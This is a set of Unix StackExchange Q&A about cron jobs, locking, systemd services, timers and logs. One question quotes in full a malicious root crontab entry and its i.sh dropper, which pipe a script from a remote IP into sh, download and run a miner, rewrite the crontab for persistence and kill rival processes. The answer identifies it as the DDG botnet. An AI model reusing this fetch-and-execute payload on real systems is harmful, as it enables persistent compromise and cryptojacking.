date int64 1,220B 1,719B | question_description stringlengths 28 29.9k | accepted_answer stringlengths 12 26.4k | question_title stringlengths 14 159 |
|---|---|---|---|
1,341,916,713,000 |
man 5 crontab is pretty clear on how to use crontab to run a script on boot:
These special time specification "nicknames" are supported, which replace the 5 initial time and date
fields, and are prefixed by the `@` character:
@reboot : Run once after reboot.
So I happily added a single line to my crontab (under my user account, not root):
@reboot /home/me/myscript.sh
But for some reason, myscript.sh wouldn't run on machine reboot.
(it runs fine if I invoke it from the command line, so it's not a permissions problem)
What am I missing?
Update to answer @Anthon's questions:
Oracle-linux version: 5.8 (uname: 2.6.32-300.39.2.el5uek #1 SMP)
Cron version: vixie-cron-4.1-81.el5.x86_64
Yes, /home is a mounted partition. Looks like this is the problem. How do I workaround this?
Currently, myscript.sh only echos a text message to a file in /home/me.
|
This can be a bit of a confusing topic because there are different implementations of cron. Also there were several bugs that broke this feature, and there are also some use cases where it simply won't work, specifically if you do a shutdown/boot vs. a reboot.
Bugs
datapoint #1
One such bug in Debian is covered here, titled: cron: @reboot jobs are not run. This seems to have made it's way into Ubuntu as well, which I can't confirm directly.
datapoint #2
Evidence of the bug in Ubuntu would seem to be confirmed here in this SO Q&A titled: @reboot cronjob not executing.
excerpt
comment #1: .... 3) your version of crond may not support @reboot are you using vix's crond? ... show results of crontab -l -u user
comment #2: ... It might be a good idea to set it up as an init script instead of relying on a specific version of cron's @reboot.
comment #3: ... @MarkRoberts removed the reboot and modified the 1 * * * * , to */1 * * * * , problem is solved! Where do I send the rep pts Mark? Thank you!
The accepted answer in that Q&A also had this comment:
Seems to me Lubuntu doesn't support the @Reboot Cron syntax.
Additional evidence
datapoint #3
As additional evidence there was this thread that someone was attempting the very same thing and getting frustrated that it didn't work. It's titled: Thread: Cron - @reboot jobs not working.
excerpt
Re: Cron - @reboot jobs not working
Quote Originally Posted by ceallred View Post
This is killing me... Tried the wrapper script. Running manually generates the log file... rebooting and the job doesn't run or create log file.
Syslog shows that CRON ran the job... but again, no output and the process isn't running.
Jul 15 20:07:45 RavenWing cron[1026]: (CRON) INFO (Running @reboot jobs)
Jul 15 20:07:45 RavenWing CRON[1053]: (ceallred) CMD (/home/ceallred/Scripts/run_spideroak.sh > /home/ceallred/Scripts/SpiderOak.log 2>&1 &)
It's seems like cron doesn't like the @reboot command.... Any other ideas?
Okay... Partially solved. I'll mark this one as solved and start a new thread with the new issue.....
I think the answer was my encrypted home directory wasn't mounted when CRON was trying to run the script (stored in /home/username/scripts). Moved to /usr/scripts and the job runs as expected.
So now it appears to be a spideroak issue. Process starts, but by the time the boot process is finished, it's gone. I'm guessing a crash for some reason.... New thread to ask about that.
Thanks for all the help!
Once this above user figured out his issue he was able to get @reboot working out of the crontab entry of a user.
I'm not entirely sure what version of cron is used on Ubuntu, but this would seem to indicate that user's can use @reboot too, or that the bug was fixed at some point in subsequent versions of cron.
datapoint #4
I tested on CentOS 6 the following and it worked.
Example
$ crontab -l
@reboot echo "hi" > /home/sam/reboot.txt 2>&1
I then rebooted the system.
$ sudo reboot
After the reboot.
$ cat reboot.txt
hi
Take aways
This feature does seem to be supported for both system and user crontab entries.
You have to make sure that it's supported/working in your particular distro and/or version of the cron package.
For more on how the actual mechanism works for @reboot I did come across this blog post which discusses the innards. It's titled: @reboot - explaining simple cron magic.
Debugging crond
You can turn up the verbosity of crond by adding the following to this configuration file on RHEL/CentOS/Fedora based distros.
$ more crond
# Settings for the CRON daemon.
# CRONDARGS= : any extra command-line startup arguments for crond
CRONDARGS="-L 2"
The valid levels are 0, 1, or 2. To revert this file back to it's default logging level simply remove the "-L 2" when you're done debugging the situation.
| crontab's @reboot only works for root? |
1,341,916,713,000 |
Here's what I did on Debian Jessie:
install cron via apt-get install cron
put a backup_crontab file in /etc/cron.d/
However the task is never running.
Here are some outputs:
/# crontab -l
no crontab for root
/# cd /etc/cron.d && ls
backup_crontab
/etc/cron.d# cat backup_crontab
0,15,30,45 * * * * /backup.sh >/dev/null 2>&1
Is there something to do to activate a particular crontab, or to activate the cron "service" in itself?
|
Files in /etc/cron.d need to also list the user that the job is to be run under.
i.e.
0,15,30,45 * * * * root /backup.sh >/dev/null 2>&1
You should also ensure the permissions and owner:group are set correctly (-rw-r--r-- and owned by root:root)
| Crontab never running while in /etc/cron.d |
1,341,916,713,000 |
Sometimes you have to make sure that only one instance of a shell script is running at the same time.
For example a cron job which is executed via crond that does not provide
locking on its own (e.g. the default Solaris crond).
A common pattern to implement locking is code like this:
#!/bin/sh
LOCK=/var/tmp/mylock
if [ -f $LOCK ]; then # 'test' -> race begin
echo Job is already running\!
exit 6
fi
touch $LOCK # 'set' -> race end
# do some work
rm $LOCK
Of course, such code has a race condition. There is a time window where the
execution of two instances can both advance after line 3 before one is able to
touch the $LOCK file.
For a cron job this is usually not a problem because you have an interval of
minutes between two invocations.
But things can go wrong - for example when the lockfile is on a NFS server -
that hangs. In that case several cron jobs can block on line 3 and queue up. If
the NFS server is active again then you have thundering herd of parallel
running jobs.
Searching on the web I found the tool lockrun which seems like a good
solution to that problem. With it you run a script that needs locking like
this:
$ lockrun --lockfile=/var/tmp/mylock myscript.sh
You can put this in a wrapper or use it from your crontab.
It uses lockf() (POSIX) if available and falls back to flock() (BSD). And lockf() support over NFS should be relatively widespread.
Are there alternatives to lockrun?
What about other cron daemons? Are there common crond's that support locking in a
sane way? A quick look into the man page of Vixie Crond (default on
Debian/Ubuntu systems) does not show anything about locking.
Would it be a good idea to include a tool like lockrun into coreutils?
In my opinion it implements a theme very similar to timeout, nice and friends.
|
Here's another way to do locking in shell script that can prevent the race condition you describe above, where two jobs may both pass line 3. The noclobber option will work in ksh and bash. Don't use set noclobber because you shouldn't be scripting in csh/tcsh. ;)
lockfile=/var/tmp/mylock
if ( set -o noclobber; echo "$$" > "$lockfile") 2> /dev/null; then
trap 'rm -f "$lockfile"; exit $?' INT TERM EXIT
# do stuff here
# clean up after yourself, and release your trap
rm -f "$lockfile"
trap - INT TERM EXIT
else
echo "Lock Exists: $lockfile owned by $(cat $lockfile)"
fi
YMMV with locking on NFS (you know, when NFS servers are not reachable), but in general it's much more robust than it used to be. (10 years ago)
If you have cron jobs that do the same thing at the same time, from multiple servers, but you only need 1 instance to actually run, the something like this might work for you.
I have no experience with lockrun, but having a pre-set lock environment prior to the script actually running might help. Or it might not. You're just setting the test for the lockfile outside your script in a wrapper, and theoretically, couldn't you just hit the same race condition if two jobs were called by lockrun at exactly the same time, just as with the 'inside-the-script' solution?
File locking is pretty much honor system behavior anyways, and any scripts that don't check for the lockfile's existence prior to running will do whatever they're going to do. Just by putting in the lockfile test, and proper behavior, you'll be solving 99% of potential problems, if not 100%.
If you run into lockfile race conditions a lot, it may be an indicator of a larger problem, like not having your jobs timed right, or perhaps if interval is not as important as the job completing, maybe your job is better suited to be daemonized.
EDIT BELOW - 2016-05-06 (if you're using KSH88)
Base on @Clint Pachl's comment below, if you use ksh88, use mkdir instead of noclobber. This mostly mitigates a potential race condition, but doesn't entirely limit it (though the risk is miniscule). For more information read the link that Clint posted below.
lockdir=/var/tmp/mylock
pidfile=/var/tmp/mylock/pid
if ( mkdir ${lockdir} ) 2> /dev/null; then
echo $$ > $pidfile
trap 'rm -rf "$lockdir"; exit $?' INT TERM EXIT
# do stuff here
# clean up after yourself, and release your trap
rm -rf "$lockdir"
trap - INT TERM EXIT
else
echo "Lock Exists: $lockdir owned by $(cat $pidfile)"
fi
And, as an added advantage, if you need to create tmpfiles in your script, you can use the lockdir directory for them, knowing they will be cleaned up when the script exits.
For more modern bash, the noclobber method at the top should be suitable.
| Correct locking in shell scripts? |
1,341,916,713,000 |
When configuring cron to run a command every other day using the "Day of Month" field, like so:
1 22 */2 * * COMMAND
it runs every time the day of month is odd: 1,3,5,7,9 and so on.
How can I configure cron to run on days of month that are even like 2,6,8,10 and so on (without specifying it literally, which is problematic as every month has a different number of days in the month)?
|
The syntax you tried is actually ambiguous. Depending on how many days are in the month, some months it will run on odd days and some on even. This is because the way it is calculated takes the total number of possibilities and divides them up. You can override this strage-ish behavior by manually specifying the day range and using either an odd or even number of days. Since even day scripts would never run on the 31st day of longer months, you don't lose anything using 30 days as the base for even-days, and by specifying specifically to divide it up as if there were 31 days you can force odd-day execution.
The syntax would look like this:
# Will only run on odd days:
0 0 1-31/2 * * command
# Will only run on even days:
0 0 2-30/2 * * command
Your concern about months not having the same number of days is not important here because no months have MORE days than this, and for poor February, the date range just won't ever match the last day or two, but it will do no harm having it listed.
The only 'gotcha' for this approach is that if you are on an odd day cycle, following months with 31 days your command will also run on the first of the month. Likewise if you are forcing an even cycle, each leap year will cause one three-day cycle at the end of February. You cannot really get around the fact that any regular pattern of "every other day" is not always going to fall on even or odd days in every month and any way you force this you will either have an extra run or be missing a run between months with mismatched day counts.
| How can I tell cron to run a command every other day (odd/even) |
1,341,916,713,000 |
First of all I'm using CentOS
[root@a etc]# cat system-release
CentOS release 6.5 (Final)
[root@a cron.daily]# ps -ef | grep cron
root 982 1 0 Jun14 ? 00:01:15 crond
root 5692 5441 0 00:49 pts/0 00:00:00 grep cron
[root@a cron.daily]#
And I'm running out of my resources, so I want to delete the old log files.In this case i would like to delete the old secure logs which are almost more than 100MB's in size, So i gave the below crontab entries for root user.
[root@a etc]# crontab -l
0 1 * * * find /var/log -name "secure-*" -mtime +5 -exec rm {} \;
[root@a etc]#
After very few days later i came to know this crontab entry doesn't work and still i see old files.
[root@a log]# find /var/log -name "secure-*"
/var/log/secure-20141214
/var/log/secure-20141107
/var/log/secure-20141130
/var/log/secure-20141221
[root@a log]#
Later i tried to search for the crontab logs under /etc/crontab.daily directory and not found any relevant results. Where to find the crontab logs and how to know whether the crontab is running successfully or not ?
|
Cron logs on CentOS 6 are located in /var/log/cron by default. This only logs the execution of commands, not the results or exit statuses. The output of the executed command goes to the user's mail by default (root's mail in this case). An alternate email can be specified by the MAILTO variable inside of the crontab.
You should look at adjusting logrotate rules, instead of your custom cron, which already handles deletion of /var/log/secure logs.
| Where to find the Crontab logs in CentOS |
1,341,916,713,000 |
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing.
Crontab entry:
*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh
The contents of http://103.219.112.66:8000/i.sh are:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4
ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -
My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual.
What is this? What should I do?
|
It is a DDG mining botnet , how it work :
exploiting an RCE vulnerability
modifying the crontab
downloading the appropriate mining program (written with go)
starting the mining process
DDG: A Mining Botnet Aiming at Database Servers
SystemdMiner when a botnet borrows another botnet’s infrastructure
U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)
| Suspicious crontab entry running 'xribfa4' every 15 minutes |
1,341,916,713,000 |
I am currently trying to understand the difference between init.d and cron @reboot for running a script at startup/booting of the system.
The use of @reboot (this method was mentioned in this forum by hs.chandra) is some what simpler, by simply going into crontab -e and creating a @reboot /some_directory/to_your/script/your_script.txt and then your_script.txt shall be executed every time the system is rebooted. An in depth explanation of @reboot is here
Alternatively by embedding /etc/init.d/your_script.txt into the second line of your script ie:
#!/bin/bash
# /etc/init.d/your_script.txt
You can run chmod +x /etc/init.d/your_script.txt and that should also result for your_script.txt to run every time the system is booted.
What are the key differences between the two?
Which is more robust?
Is there a better one out of the two?
Is this the correct way of embedding a script to run during booting?
I will be incorporating a bash .sh file to run during startup.
|
init.d, also known as SysV script, is meant to start and stop services during system initialization and shutdown. (/etc/init.d/ scripts are also run on systemd enabled systems for compatibility).
The script is executed during the boot and shutdown (by default).
The script should be an init.d script, not just a script . It should support start and stop and more (see Debian policy)
The script can be executed during the system boot (you can define when).
crontab (and therefore @reboot).
cron will execute any regular command or script, nothing special here.
any user can add a @reboot script (not just root)
on a Debian system with systemd: cron's @reboot is executed during multi-user.target.
on a Debian system with SysV (not systemd), crontab(5) mention: Please note that startup, as far as @reboot is concerned, is the time when the cron(8) daemon startup. In particular, it may be before some system daemons, or other facilities, were startup. This is due to the boot order sequence of the machine.
it's easy to schedule the same script at boot and periodically.
/etc/rc.local is often considered to be ugly or deprecated (at least by redhat), still it had some nice features:
rc.local will execute any regular command or script, nothing special here.
on a Debian system with SysV (not systemd): rc.local was (almost) the last service to start.
but on a Debian system with systemd: rc.local is executed after network.target by default (not network-online.target !)
Regarding systemd's network.target and network-online.target, read Running Services After the Network is up.
| Running a script during booting/startup; init.d vs cron @reboot |
1,341,916,713,000 |
I'm using CentOS 7 what my aim is to create a cron for every five seconds but as I researched we can use cron only for a minute so what I am doing now is I have created a shell file.
hit.sh
while sleep 5; do curl http://localhost/test.php; done
but I have hit it manually through right clicking it.
What I want is to create a service for that file so that i can start and stop it automatically.
I found the script to create a service
#!/bin/bash
# chkconfig: 2345 20 80
# description: Description comes here....
# Source function library.
. /etc/init.d/functions
start() {
# code to start app comes here
# example: daemon program_name &
}
stop() {
# code to stop app comes here
# example: killproc program_name
}
case "$1" in
start)
start
;;
stop)
stop
;;
restart)
stop
start
;;
status)
# code to check status of app comes here
# example: status program_name
;;
*)
echo "Usage: $0 {start|stop|status|restart}"
esac
exit 0
But I don't know what to write in start or stop methods I tried placing the same content of hit.sh in start(){} but it gave error for } in stop method.
|
Users trying to run a script as a daemon on a modern system should be using systemd:
[Unit]
Description=hit service
After=network-online.target
[Service]
ExecStart=/path/to/hit.sh
[Install]
WantedBy=multi-user.target
Save this as /etc/systemd/system/hit.service, and then you will be able to start/stop/enable/disable it with systemctl start hit, etc.
Old answer from 2015:
If you'd like to reuse your code sample, it could look something like:
#!/bin/bash
case "$1" in
start)
/path/to/hit.sh &
echo $!>/var/run/hit.pid
;;
stop)
kill `cat /var/run/hit.pid`
rm /var/run/hit.pid
;;
restart)
$0 stop
$0 start
;;
status)
if [ -e /var/run/hit.pid ]; then
echo hit.sh is running, pid=`cat /var/run/hit.pid`
else
echo hit.sh is NOT running
exit 1
fi
;;
*)
echo "Usage: $0 {start|stop|status|restart}"
esac
exit 0
Naturally, the script you want to be executed as a service should go to e.g. /usr/local/bin/hit.sh, and the above code should go to /etc/init.d/hitservice.
For each runlevel which needs this service running, you will need to create a respective symlink. For example, a symlink named /etc/init.d/rc5.d/S99hitservice will start the service for runlevel 5. Of course, you can still start and stop it manually via service hitservice start/service hitservice stop
| How do I create a service for a shell script so I can start and stop it like a daemon? |
1,341,916,713,000 |
I want to use systemd to run a command every 5 minutes. However, there is a risk that occasionally the task may take longer than 5 minutes to run. At that point, will systemd start a second instance of the command i.e. will I end up with 2 processes running?
Is it possible to tell systemd not to start a second process if the first hasn't completed? If not, what are some good workarounds?
Note: I hope the answer is "That's the default behavior. It just isn't documented." If this is the situation, can someone tell me how to file a bug against their docs?
Note: Cron has a similar issue which is discussed in https://unix.stackexchange.com/a/173928/11244. I'm looking for the systemd equivalent.
|
This is the default (and the only) behavior. It is not explicitly documented, but is implied by systemd's operation logic.
systemd.timer(5) reads:
For each timer file, a matching unit file must exist, describing the unit to activate when the timer elapses.
systemd(1), in turn, describes the concept of unit states and transitions between them:
Units may be "active" (meaning started, bound, plugged in, ..., depending on the unit type, see below), or "inactive" (meaning stopped, unbound, unplugged, ...), as well as in the process of being activated or deactivated, i.e. between the two states (these states are called "activating", "deactivating").
This means that the triggering of a timer leads to "activation" of the matching unit, i. e. its transition to the "active" state.
If the matching unit is already "active" at the time of "activation" (for a service unit, this means "the main process is still running", unless the service unit has Type=oneshot and RemainAfterExit=true), it should be obvious that no action will be taken.
| Does systemd timer unit skip the next run if the process hasn't finished yet? |
1,341,916,713,000 |
How are files under /etc/cron.d used?
From https://www.cyberciti.biz/faq/how-do-i-add-jobs-to-cron-under-linux-or-unix-oses/
cron reads the files in /etc/cron.d/ directory. Usually system daemon
such as sa-update or sysstat places their cronjob here. As a root user
or superuser you can use following directories to configure cron jobs.
You can directly drop your scripts here. The run-parts command run
scripts or programs in a directory via /etc/crontab file:
/etc/cron.d/ Put all scripts here and call them from /etc/crontab
file.
On Lubuntu 18.04, the files under /etc/cron.d seem to be crontab files not shell scripts (which was mentioned in the above link):
$ cat /etc/cron.d/anacron
# /etc/cron.d/anacron: crontab entries for the anacron package
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
30 7 * * * root [ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi
My /etc/crontab file never refers to files under/etc/cron.d, contrary to what the link says:
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
Could you explain how the files under /etc/cron.d are used? Thanks.
|
In Debian derivatives, including Lubuntu, the files in /etc/cron.d are effectively /etc/crontab snippets, with the same format. Quoting the cron manpage:
Additionally, in Debian, cron reads the files in the /etc/cron.d directory. cron treats the files in /etc/cron.d as in the same way as the /etc/crontab file (they follow the special format of that file, i.e. they include the user field). However, they are independent of /etc/crontab: they do not, for example, inherit environment variable settings from it. This change is specific to Debian see the note under DEBIAN SPECIFIC below.
Like /etc/crontab, the files in the /etc/cron.d directory are monitored for changes. In general, the system administrator should not use /etc/cron.d/, but use the standard system crontab /etc/crontab.
The Debian-specific section hints at the reason system administrators shouldn’t use /etc/cron.d:
Support for /etc/cron.d (drop-in dir for package crontabs)
It’s designed to allow packages to install crontab snippets without having to modify /etc/crontab.
| How are files under /etc/cron.d used? |
1,341,916,713,000 |
What is the main difference between the directory cron.d (as in /etc/cron.d/) and crontab?
As far as I understand, one could create a file like /etc/cron.d/my_non_crontab_cronjobs and put whatever one wants inside it, just as one would put them in crontab via crontab -e.
So what is the main difference between the two?
|
The differences are documented in detail in the cron(8) manpage in Debian. The main difference is that /etc/cron.d is populated with separate files, whereas crontab manages one file per user; it’s thus easier to manage the contents of /etc/cron.d using scripts (for automated installation and updates), and easier to manage crontab using an editor (for end users really).
Other important differences are that not all distributions support /etc/cron.d, and that the files in /etc/cron.d have to meet a certain number of requirements (beyond being valid cron jobs): they must be owned by root, and must conform to run-parts’ naming conventions (no dots, only letters, digits, underscores, and hyphens).
If you’re considering using /etc/cron.d, it’s usually worth considering one of /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly, or /etc/cron.monthly instead.
| What is the difference between cron.d (as in /etc/cron.d/) and crontab? |
1,341,916,713,000 |
I have seen a crontab record in system.
0-55/5 * * * * root <command>
I read the crontab -e example files and I know the first position stands for minute. But I cannot figure out the meaning of / (slash) there. Could anyone explain the meaning to me?
|
The forward slash is used in conjunction with ranges to specify step values.
0-55/5 * * * * means your command will be executed every five minutes (0, 5, 10, 15, ..., 55).
0-55/5 is the same as */5.
| What's the meaning of the slash in crontab? |
1,341,916,713,000 |
I'm wondering who starts unattended-upgrades in my debian-jessie:
my man page
DESCRIPTION
This program can download and install security upgrades automatically
and unattended, taking care to only install packages from the config‐
ured APT source, and checking for dpkg prompts about configuration file
changes. All output is logged to /var/log/unattended-upgrades.log.
This script is the backend for the APT::Periodic::Unattended-Upgrade
option and designed to be run from cron (e.g. via /etc/cron.daily/apt).
But my crontab doesn't show anything by crontab command:
@stefano:/etc/cron.daily$ crontab -l
no crontab for stefano
# crontab -l
no crontab for root
But my unattended-upgrade work fine!(my unattended-upgrades log file) :
2017-02-05 12:42:42,835 INFO Initial blacklisted packages:
2017-02-05 12:42:42,866 INFO Initial whitelisted packages:
2017-02-05 12:42:42,868 INFO Starting unattended upgrades script
2017-02-05 12:42:42,870 INFO Allowed origins are: ['o=Debian,n=jessie', 'o=Debian,n=jessie-updates', 'o=Debian,n=jessie-backports', 'origin=Debian,codename=jessie,label=Debian-Security']
2017-02-05 12:43:15,848 INFO No packages found that can be upgraded unattended
Where do I have to check/modify if I want to change my schedule?
|
Where do I have to check/modify if I want to change my schedule?
The unattended-upgrades is configured to be applied automatically .
To verify it check the /etc/apt/apt.conf.d/20auto-upgrades file , you will get :
APT::Periodic::Update-Package-Lists "1";
APT::Periodic::Unattended-Upgrade "1";
to modify it you should run the following command:
dpkg-reconfigure -plow unattended-upgrades
sample output:
Applying updates on a frequent basis is an important part of keeping
systems secure. By default, updates need to be applied manually using
package management tools.
Alternatively, you can choose to have this system automatically download
and install security updates.
Automatically download and install stable updates?
Choose NO to stop the auto update
Verify the /etc/apt/apt.conf.d/20auto-upgrades again, you should get :
APT::Periodic::Update-Package-Lists "0";
APT::Periodic::Unattended-Upgrade "0";
Edit
To run the unattended-upgrades weekly edit your /etc/apt/apt.conf.d/20auto-upgrades as follows :
APT::Periodic::Update-Package-Lists "7";
APT::Periodic::Unattended-Upgrade "1";
A detailed example can be found on Debian-Wiki : automatic call via /etc/apt/apt.conf.d/02periodic
APT::Periodic::Update-Package-Lists
This option allows you to specify the frequency (in days) at which the package lists are refreshed. apticron users can do without this variable, since apticron already does this task.
| How is unattended-upgrades started and how can I modify its schedule? |
1,341,916,713,000 |
I am using Arch Linux with KDE/Awesome WM. I am trying to get
notify-send to work with cron.
I have tried setting DISPLAY/XAUTHORITY variables, and running notify-send with "sudo -u", all without result.
I am able to call notify-send interactively from the session and get notifications.
FWIW, the cron job is running fine which I verified by echoing stuff to a temporary file. It is just the "notify-send" that fails to work.
Code:
[matrix@morpheus ~]$ crontab -l
* * * * * /home/matrix/scripts/notify.sh
[matrix@morpheus ~]$ cat /home/matrix/scripts/notify.sh
#!/bin/bash
export DISPLAY=127.0.0.1:0.0
export XAUTHORITY=/home/matrix/.Xauthority
echo "testing cron" >/tmp/crontest
sudo -u matrix /usr/bin/notify-send "hello"
echo "now tested notify-send" >>/tmp/crontest
[matrix@morpheus ~]$ cat /tmp/crontest
testing cron
now tested notify-send
[matrix@morpheus ~]$
As you can see the echo before & after notify-send worked.
Also I have tried setting DISPLAY=:0.0
UPDATE:
I searched a bit more and found that DBUS_SESSION_BUS_ADDRESS needs to be set. And after hardcoding this using the value I got from my interactive session, the tiny little "hello" message started popping up on the screen every minute!
But the catch is this variable is not permanent per that post, so I'll have try the the named pipe solution suggested there.
[matrix@morpheus ~]$ cat scripts/notify.sh
#!/bin/bash
export DISPLAY=127.0.0.1:0.0
export XAUTHORITY=/home/matrix/.Xauthority
export DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-BouFPQKgqg,guid=64b483d7678f2196e780849752e67d3c
echo "testing cron" >/tmp/crontest
/usr/bin/notify-send "hello"
echo "now tested notify-send" >>/tmp/crontest
Since cron doesn't seem to support notify-send (at least not directly) is there some other notification system that is more cron friendly that I can use?
|
You need to set the DBUS_SESSION_BUS_ADDRESS variable. By default cron does
not have access to the variable. To remedy this put the following script
somewhere and call it when the user logs in, for example using awesome and
the run_once function mentioned on the wiki. Any method will do, since it
does not harm if the function is called more often than required.
#!/bin/sh
touch $HOME/.dbus/Xdbus
chmod 600 $HOME/.dbus/Xdbus
env | grep DBUS_SESSION_BUS_ADDRESS > $HOME/.dbus/Xdbus
echo 'export DBUS_SESSION_BUS_ADDRESS' >> $HOME/.dbus/Xdbus
exit 0
This creates a file containing the required Dbus evironment variable. Then in
the script called by cron you import the variable by sourcing the script:
if [ -r "$HOME/.dbus/Xdbus" ]; then
. "$HOME/.dbus/Xdbus"
fi
Here is an answer that uses the same
mechanism.
| Using notify-send with cron |
1,341,916,713,000 |
Cron doesn't use the path of the user whose crontab it is and, instead, has its own. It can easily be changed by adding PATH=/foo/bar at the beginning of the crontab, and the classic workaround is to always use absolute paths to commands run by cron, but where is cron's default PATH defined?
I created a crontab with the following contents on my Arch system (cronie 1.5.1-1) and also tested on an Ubuntu 16.04.3 LTS box with the same results:
$ crontab -l
* * * * * echo "$PATH" > /home/terdon/fff
That printed:
$ cat fff
/usr/bin:/bin
But why? The default system-wide path is set in /etc/profile, but that includes other directories:
$ grep PATH= /etc/profile
PATH="/usr/local/sbin:/usr/local/bin:/usr/bin"
There is nothing else relevant in /etc/environment or /etc/profile.d, the other files I thought might possibly be read by cron:
$ grep PATH= /etc/profile.d/* /etc/environment
/etc/profile.d/jre.sh:export PATH=${PATH}:/usr/lib/jvm/default/bin
/etc/profile.d/mozilla-common.sh:export MOZ_PLUGIN_PATH="/usr/lib/mozilla/plugins"
/etc/profile.d/perlbin.sh:[ -d /usr/bin/site_perl ] && PATH=$PATH:/usr/bin/site_perl
/etc/profile.d/perlbin.sh:[ -d /usr/lib/perl5/site_perl/bin ] && PATH=$PATH:/usr/lib/perl5/site_perl/bin
/etc/profile.d/perlbin.sh:[ -d /usr/bin/vendor_perl ] && PATH=$PATH:/usr/bin/vendor_perl
/etc/profile.d/perlbin.sh:[ -d /usr/lib/perl5/vendor_perl/bin ] && PATH=$PATH:/usr/lib/perl5/vendor_perl/bin
/etc/profile.d/perlbin.sh:[ -d /usr/bin/core_perl ] && PATH=$PATH:/usr/bin/core_perl
There is also nothing relevant in any of the files in /etc/skel, unsurprisingly, nor is it being set in any /etc/cron* file:
$ grep PATH /etc/cron* /etc/cron*/*
grep: /etc/cron.d: Is a directory
grep: /etc/cron.daily: Is a directory
grep: /etc/cron.hourly: Is a directory
grep: /etc/cron.monthly: Is a directory
grep: /etc/cron.weekly: Is a directory
/etc/cron.d/0hourly:PATH=/sbin:/bin:/usr/sbin:/usr/bin
So, where is cron's default PATH for user crontabs being set? Is it hardcoded in cron itself? Doesn't it read some sort of configuration file for this?
|
It’s hard-coded in the source code (that link points to the current Debian cron — given the variety of cron implementations, it’s hard to choose one, but other implementations are likely similar):
#ifndef _PATH_DEFPATH
# define _PATH_DEFPATH "/usr/bin:/bin"
#endif
cron doesn’t read default paths from a configuration file; I imagine the reasoning there is that it supports specifying paths already using PATH= in any cronjob, so there’s no need to be able to specify a default elsewhere. (The hard-coded default is used if nothing else specified a path in a job entry.)
| Where is cron's PATH set? |
1,341,916,713,000 |
On a new Ubuntu 10.4 instance, I tried to use the locate command only to receive the error
locate: can not stat () `/var/lib/mlocate/mlocate.db': No such file or directory
from using this command on other systems I'm guessing that this means the database has not yet been built (it is a fresh install). I believe it is supposed to run daily, but how would I queue it up to run immediately?
Also, how is "run daily" determined? If I have a box that I only turn on for an hour at a time will the database ever be built on it's own?
|
The cron job is defined in /etc/cron.daily/mlocate.
To run it immediately:
sudo updatedb
or better
sudo ionice -c3 updatedb
This is better because updatedb is set in the Idle I/O scheduling class, so that it do not disturb (from the I/O point of view) other applications. From ionice man page:
-c class
The scheduling class. 0 for none, 1 for real time, 2 for
best-effort, 3 for idle.
........................
Idle A program running with idle io priority will only get disk time
when no other program has asked for disk io for a defined
grace period. The impact of idle io processes on normal system
activity should be zero. This scheduling class does not take a
priority argument. Presently, this scheduling class is permitted
for an ordinary user (since kernel 2.6.25).
| How do I enable locate and queue the database to be built? |
1,341,916,713,000 |
On Redhat systems cron logs into /var/log/cron file. What is the equivalent of that file on Debian systems?
|
